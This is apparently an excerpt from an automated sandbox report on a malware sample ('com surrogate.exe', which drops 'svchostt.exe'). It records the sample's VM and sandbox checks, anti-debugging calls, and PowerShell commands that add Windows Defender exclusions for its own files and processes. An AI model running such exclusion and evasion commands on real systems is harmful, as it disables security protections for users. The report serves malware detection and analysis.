                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\svchostt.exe  Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                      Source: C:\Users\user\Desktop\com surrogate.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\com surrogate.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: com surrogate.exe, svchostt.exe.0.dr | Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\com surrogate.exe | Memory allocated: 10F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\com surrogate.exe | Memory allocated: 1AC60000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1050000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1AB40000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: C70000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1A980000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1360000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1AF00000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1480000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exe | Memory allocated: 1AFE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\com surrogate.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\com surrogate.exe | Window / User API: threadDelayed 1933
                      Source: C:\Users\user\Desktop\com surrogate.exe | Window / User API: threadDelayed 7819
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5611
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4202
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8052
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1488
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7310
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2352
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6629
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3021
                      Source: C:\Users\user\Desktop\com surrogate.exe TID: 3152 | Thread sleep time: -19369081277395017s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544 | Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844 | Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912 | Thread sleep count: 7310 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 600 | Thread sleep count: 2352 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332 | Thread sleep count: 6629 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780 | Thread sleep count: 3021 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 5184 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 5668 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 6668 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 5912 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\com surrogate.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\com surrogate.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\catroot2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\AppxSip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SYSTEM32\OpcServices.DLL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\wshext.dll
                      Source: svchostt.exe.0.dr | Binary or memory string: vmware
                      Source: com surrogate.exe, 00000000.00000002.2904869847.000000001BAB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: com surrogate.exe, 00000000.00000002.2904869847.000000001BAB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E7A41 CheckRemoteDebuggerPresent,0_2_00007FFD9B7E7A41
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\svchostt.exe | Process token adjusted: Debug
                      Source: C:\Users\user\svchostt.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\com surrogate.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
